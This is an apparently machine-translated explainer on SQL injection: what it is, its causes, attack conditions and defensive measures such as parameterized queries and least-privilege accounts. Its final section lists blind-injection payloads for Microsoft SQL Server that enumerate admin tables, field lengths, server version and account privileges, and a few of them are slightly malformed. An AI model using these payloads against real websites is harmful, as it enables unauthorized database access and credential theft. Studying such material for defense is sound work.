The so-called SQL injection is to deceive the server to execute malicious SQL commands by inserting SQL commands into web form submission or inputting the query string of domain name or page request. Specifically, it is the ability to use existing applications to inject (malicious) SQL commands into the execution of the backend database engine, which can be used to enter (malicious) SQL statements in a web form to get a security vulnerability on a website. database, rather than executing SQL statements as the designer intended. For example, many previous video sites leaked VIP member passwords mostly by submitting query characters through WEB forms, which are particularly vulnerable to SQL injection attacks.
principle
SQL injection attacks refer to constructing special inputs as parameters and passing them into web applications. Most of these inputs are some combination of SQL syntax. By executing SQL statements, the operations required by the attacker are executed. The main reason is that the program is not detailed. Filter the data entered by the user, causing illegal data to invade the system.
According to related technical principles, SQL injection can be divided into platform layer injection and code layer injection. The former is caused by an insecure database configuration or a vulnerability in the database platform; the latter is mainly caused by the programmer not carefully filtering the input, thereby executing illegal data queries. Based on this, the causes of SQL injection are usually manifested in the following aspects: ① Improper type handling; ② Unsafe database configuration; ③ Unreasonable query set handling; ④ Improper error handling; ⑤ Improper handling of escape characters; ⑥ Improper handling of multiple submissions.
attack
SQL injection attacks occur when an application uses the input to construct dynamic SQL statements to access the database. SQL injection can also occur if the code uses stored procedures that are passed as strings containing unfiltered user input. SQL injection can cause an attacker to use the application login to execute commands in the database. The relevant SQL injection can be performed by the testing tool pangolin. This problem can be exacerbated if the application connects to the database using an over-privileged account. In some forms, the content entered by the user is directly used to construct dynamic SQL commands, or as input parameters of stored procedures, and these forms are particularly vulnerable to SQL injection attacks. While many website programs are written without judging the legitimacy of user input or improper handling of variables in the program, the application program has potential security risks. In this way, the user can submit a piece of database query code, and obtain some sensitive information or control the entire server according to the results returned by the program, so SQL injection occurs.
protection
To sum up, the main points are as follows:
1. Never trust user input. Validate the user's input by using regular expressions or limit the length; for single quotes and
Double "-" for conversion, etc.
2. Never use dynamic assembly sql, you can use parameterized sql or directly use stored procedures for data query and access.
3. Never use database connections with administrator privileges, use separate database connections with limited privileges for each application.
4. Do not store confidential information directly, encrypt or hash out passwords and sensitive information.
5. The exception information of the application should give as few hints as possible, and it is best to use custom error information to wrap the original error information
6. The detection method of sql injection generally adopts auxiliary software or website platform to detect. The software generally adopts the sql injection detection tool jsky, and the website platform has the Yisi website security platform detection tool. MDCSOFT SCAN et al. Using MDCSOFT-IPS can effectively defend against SQL injection, XSS attacks, etc.
Statement features
1. Determine whether there is an injection point
; and 1=1 and 1=2
2. Guess the name of the general table is nothing more than admin adminuser user pass password etc..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) --- determine whether there is a table of admin
3. Guess the number of accounts if 0< returns to the correct page, 1< returns to the error page, indicating that the number of accounts is 1
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4. Guess the field name Add the field name we think of in the len( ) brackets.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(user field name)>0)
and 1=(select count(*) from admin where len(password field name password)>0)
5. Guess the length of each field Guessing the length is to transform > 0 until the correct page is returned
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) the correct length is 6
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) error length is 12
and 1=(select count(*) from admin where len(password)=12) 正确
6. Look at the patch made by the server = an error has been made and the SP4 patch has been applied
and 1=(select @@VERSION)--
7. Look at the permissions of the database connection account, and it returns to normal, which proves that it is the sysadmin permission of the server role.
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
8 Determine the account to connect to the database. (The connection using the SA account returns to normal = it proves that the connection account is SA)
and sa=(SELECT System_user)--
and user_name()=dbo--
and 0<>(select user_name()--